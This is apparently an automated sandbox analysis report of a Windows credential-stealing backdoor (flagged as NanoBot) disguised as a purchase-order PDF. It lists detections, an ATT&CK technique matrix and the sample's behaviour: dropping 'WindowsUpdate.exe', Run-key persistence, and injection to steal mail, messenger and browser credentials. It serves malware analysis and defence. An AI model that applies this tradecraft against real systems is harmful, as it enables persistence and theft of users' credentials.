              Source: Yara match | File source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara match | File source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_1AEB0F6E bind, | 8_2_1AEB0F6E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_1AEB0B5E listen, | 8_2_1AEB0B5E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_1AEB0B20 listen, | 8_2_1AEB0B20
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 8_2_1AEB0F3B bind, | 8_2_1AEB0F3B
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_1EFB0B5E listen, | 11_2_1EFB0B5E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_1EFB1096 bind, | 11_2_1EFB1096
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_1EFB1063 bind, | 11_2_1EFB1063
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Code function: 11_2_1EFB0B20 listen, | 11_2_1EFB0B20

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Replication Through Removable Media1 | Windows Management Instrumentation1 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools1 | OS Credential Dumping1 | System Time Discovery2 | Replication Through Removable Media1 | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Native API11 | Application Shimming1 | Application Shimming1 | Deobfuscate/Decode Files or Information11 | Input Capture211 | Peripheral Device Discovery1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Shared Modules1 | Registry Run Keys / Startup Folder1 | Process Injection411 | Obfuscated Files or Information3 | Credentials in Registry2 | Account Discovery1 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Remote Access Software1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder1 | Software Packing11 | Credentials In Files1 | File and Directory Discovery1 | Distributed Component Object Model | Input Capture211 | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | - | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | System Information Discovery38 | SSH | Clipboard Data1 | Data Transfer Size Limits | Application Layer Protocol2 | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading11 | Cached Domain Credentials | Security Software Discovery161 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion3 | DCSync | Virtualization/Sandbox Evasion3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection411 | Proc Filesystem | Process Discovery3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories1 | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact
              Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | - | - | Service Stop

              Behavior Graph

              Behavior Graph ID: 341532
              Sample: PO 2010029_pdf Quotation from Alibaba Ale.exe
              Startdate: 19/01/2021
              Architecture: WINDOWS
              Score: 100

              Signatures on the start node: Found malware configuration; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 11 other signatures

              Processes started from the start node:
              • PO 2010029_pdf Quotation from Alibaba Ale.exe
                DNS/IP: whatismyipaddress.com 104.16.155.36, 49709, 80 CLOUDFLARENETUS United States; 192.168.2.1 unknown unknown
                Dropped: C:\Users\user\AppData\...\WindowsUpdate.exe (PE32); C:\...\WindowsUpdate.exe:Zone.Identifier (ASCII)
                Signatures: Changes the view of files in windows explorer (hidden files and folders); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
                Started: vbc.exe (Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)); vbc.exe (Tries to harvest and steal browser information (history, passwords, etc)); WerFault.exe; dw20.exe
              • WindowsUpdate.exe
                DNS/IP: 127.0.0.1 unknown unknown
                Dropped: C:\Users\user\...\WindowsUpdate.exe.log (ASCII)
                Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
              • WindowsUpdate.exe (second instance)

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              PO 2010029_pdf Quotation from Alibaba Ale.exe | 37% | ReversingLabs | Win32.Backdoor.NanoBot
              PO 2010029_pdf Quotation from Alibaba Ale.exe | 100% | Joe Sandbox ML | -

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Joe Sandbox ML | -
              C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 37% | ReversingLabs | Win32.Backdoor.NanoBot

              Unpacked PE Files

              Source | Detection | Scanner | Label
              11.2.WindowsUpdate.exe.ed0000.1.unpack | 100% | Avira | HEUR/AGEN.1138127
              3.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
              11.2.WindowsUpdate.exe.1ee40000.4.unpack | 100% | Avira | TR/Inject.vcoldi
              8.2.WindowsUpdate.exe.1c5f0000.4.unpack | 100% | Avira | TR/Inject.vcoldi
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpack | 100% | Avira | HEUR/AGEN.1138127
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              0.0.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.0.unpack | 100% | Avira | HEUR/AGEN.1138127
              8.2.WindowsUpdate.exe.1ad90000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              8.2.WindowsUpdate.exe.1ad90000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              11.2.WindowsUpdate.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              11.2.WindowsUpdate.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              8.2.WindowsUpdate.exe.ed0000.1.unpack | 100% | Avira | HEUR/AGEN.1138127
              11.2.WindowsUpdate.exe.1c5f0000.3.unpack | 100% | Avira | TR/Inject.vcoldi
              8.2.WindowsUpdate.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              8.2.WindowsUpdate.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack | 100% | Avira | TR/Inject.vcoldi
              8.0.WindowsUpdate.exe.ed0000.0.unpack | 100% | Avira | HEUR/AGEN.1138127
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack | 100% | Avira | TR/Inject.vcoldi
              11.2.WindowsUpdate.exe.1eed0000.5.unpack | 100% | Avira | TR/AD.MExecute.lzrac
              11.2.WindowsUpdate.exe.1eed0000.5.unpack | 100% | Avira | SPR/Tool.MailPassView.473
              11.0.WindowsUpdate.exe.ed0000.0.unpack | 100% | Avira | HEUR/AGEN.1138127
              8.2.WindowsUpdate.exe.1ee00000.5.unpack | 100% | Avira | TR/Inject.vcoldi

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              http://www.carterandcone.com.12 | 0% | Avira URL Cloud | safe
              http://www.founder.com.cn/cnBm | 0% | Avira URL Cloud | safe
              http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
              http://www.carterandcone.comItaf | 0% | Avira URL Cloud | safe
              http://foo.com/fooT | 0% | Avira URL Cloud | safe
              http://www.carterandcone.comeci | 0% | Avira URL Cloud | safe
              http://www.tiro.com | 0% | URL Reputation | safe
              http://www.fontbureau.comceco | 0% | Avira URL Cloud | safe
              http://www.goodfont.co.kr | 0% | URL Reputation | safe
              http://www.carterandcone.com | 0% | URL Reputation | safe
              http://en.w | 0% | URL Reputation | safe
              http://www.carterandcone.comypo | 0% | Avira URL Cloud | safe
              http://www.carterandcone.coml | 0% | URL Reputation | safe
              http://www.sajatypeworks.com | 0% | URL Reputation | safe
              http://www.typography.netD | 0% | URL Reputation | safe
              http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
              http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
              http://fontfabrik.com | 0% | URL Reputation | safe
              http://www.founder.com.cn/cn | 0% | URL Reputation | safe
              http://www.monotype. | 0% | URL Reputation | safe
              http://www.founder.com.cn/cnxmQ | 0% | Avira URL Cloud | safe
              http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
              http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
              http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
              http://www.sandoll.co.kr | 0% | URL Reputation | safe
              http://www.fontbureau.comalic | 0% | URL Reputation | safe
              http://www.urwpp.deDPlease | 0% | URL Reputation | safe
              http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
              http://www.carterandcone.comitk. | 0% | Avira URL Cloud | safe
              http://www.sakkal.com | 0% | URL Reputation | safe
              http://www.founder.com.cn/cn( | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              whatismyipaddress.com | 104.16.155.36 | true | false | - | high

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://whatismyipaddress.com/ | false | - | high

                  URLs from Memory and Binaries


                                                Contacted IPs


                                                Public

IP: 104.16.155.36
Domain: unknown
Country: United States
ASN: 13335
ASN Name: CLOUDFLARENETUS
Malicious: false

                                                Private

                                                IP
                                                192.168.2.1
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:341532
                                                Start date:19.01.2021
                                                Start time:14:06:23
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 40s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:34
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@10/13@1/3
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 11.7% (good quality ratio 10.9%)
                                                • Quality average: 77.3%
                                                • Quality standard deviation: 30%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 134
                                                • Number of non-executed functions: 374
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 2.18.68.82, 51.11.168.160, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.201, 92.122.213.247, 20.54.26.129, 40.88.32.150, 168.61.161.212, 51.104.144.132, 51.104.139.180, 52.254.96.93, 52.251.11.100
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

Time      Type             Description
14:08:16  API Interceptor  6x Sleep call for process: PO 2010029_pdf Quotation from Alibaba Ale.exe modified
14:08:20  API Interceptor  1x Sleep call for process: dw20.exe modified
14:08:21  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
14:08:29  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
14:08:48  API Interceptor  1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains


                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_I3UYUDMLOPVYGRAZ_7057fda4f89bb183663b41fd976febdf70a304b_00000000_124dc6e0\Report.wer
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):18018
                                                Entropy (8bit):3.7671072989618524
                                                Encrypted:false
                                                SSDEEP:192:7VE5vnFWMhV203jZIhy9UcJN5X5Q17zvMvkvDKGwNYeh/u7sfS274It0z:RInFNljzqv3vOh/u7sfX4ItI
                                                MD5:5A930DC669FC64A68231E3F0739BF7A2
                                                SHA1:2ADA755AAC4C1AAE4C6154EA8E503A5F1CAF49A5
                                                SHA-256:7CC51741A64901D2FB0BFAC502C42FAD2F109FE005831BACB958E6663483437F
                                                SHA-512:63D374183C0D9F0A68EF7E46ED2D0DD7654C1B014719C3EDF176DB3CA069DD41BB4559A3C5F78A90C84E6113674D8D43C8CB034BC6E4AAEAC333588A9AF3D81D
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.5.6.7.6.9.7.8.2.0.1.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.5.5.6.7.6.9.8.2.1.0.7.9.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.4.d.f.8.f.d.-.5.6.f.9.-.4.a.c.c.-.b.0.3.f.-.6.e.1.7.2.3.3.4.6.6.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.6.4.-.0.0.0.1.-.0.0.1.7.-.a.1.1.e.-.0.1.9.3.a.f.e.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.c.5.e.b.d.5.8.d.1.9.3.3.b.e.2.9.b.8.8.7.2.0.2.0.b.9.e.c.0.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.d.5.f.b.0.f.0.7.6.a.0.d.9.4.5.5.9.6.b.7.9.3.8.e.7.2.b.6.b.5.c.a.e.7.3.6.7.4.!.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.n. . .f.r.o.m. .A.l.i.b.a.b.a. .A.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.8.:.2.0.:.2.8.:.2.0.!.0.!.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PO 2010029_pdf _72613674f79bb87c1b11e7d393fe053666d79f1_6467c67c_1726352a\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):19162
                                                Entropy (8bit):3.773653319477634
                                                Encrypted:false
                                                SSDEEP:192:d3q5vWeHBUZMXj03jZIhy9UcJN5X5Q17zvMvkvDKGwNYeSTs/u7sES274ItihBG:opBUZMX4jzqv3vOS4/u7sEX4ItEG
                                                MD5:794BD95DB4ACDF7A0AB11BA3AB6CA638
                                                SHA1:081C01144CD21C704C0B0138BC64D81AE3B70B64
                                                SHA-256:4F64768EAF8E951A12B5269ECC5F3D26D228131F504700375153376BB14C3571
                                                SHA-512:13F3123264DCA07F3DB79D69408444CD823287AF8CA1EF6E0C72AFCF4391B951C462491E21FEAB3C48747BA92B2DE11BF89EEE1977F09A6E9F20BF4A9B910AA9
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.5.6.7.7.0.3.7.4.2.0.2.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.5.5.6.7.7.0.9.7.4.2.0.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.c.c.a.1.2.4.-.a.5.b.c.-.4.e.3.9.-.b.c.e.f.-.4.a.f.5.5.e.0.8.7.f.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.d.9.9.5.c.c.-.5.c.7.5.-.4.c.6.9.-.9.3.6.0.-.7.4.6.b.6.9.5.4.3.b.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.n. . .f.r.o.m. .A.l.i.b.a.b.a. .A.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.6.4.-.0.0.0.1.-.0.0.1.7.-.a.1.1.e.-.0.1.9.3.a.f.e.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.c.5.e.b.d.5.8.d.1.9.3.3.b.e.2.9.b.8.8.7.2.0.2.0.b.9.e.c.0.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.d.5.f.b.0.f.0.7.6.a.0.d.9.4.5.5.9.6.b.7.9.3.8.e.7.2.
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB95.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7786
                                                Entropy (8bit):3.712017053076674
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNihCx6yo6YSBmSUDMvgmfZ4OQSkCp1Lng1f45m:RrlsNiy6yo6YlSUDMvgmfGOQSNLnqfr
                                                MD5:84CEF630CF0681BFAFF5795DCD1DD9BF
                                                SHA1:20DAFD24F4C7DAF6F9E08DFB388E77B66F11C49B
                                                SHA-256:343A0751D0B019585B5A655031941A406CBF403CDDF33498853B1536B7B287D9
                                                SHA-512:15273848255FFACC787D724ADD047C34B1B0BEFE0BB86983E397E0B8E26676BD54046D8D8A5516D3ADC1195D4B528BBDD0A93D8FB7A18A182567A730E36F3149
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.4.8.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC61.tmp.xml
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4727
                                                Entropy (8bit):4.5249078201260895
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsiJgtWI99NeyWSC8B58/8fm8M4JFKnEFK+q8vIMpyzpz43d:uITfwaQTSNX8kJFKvK7pMBGd
                                                MD5:A77D974765EA039F1262BFEFC930DDD0
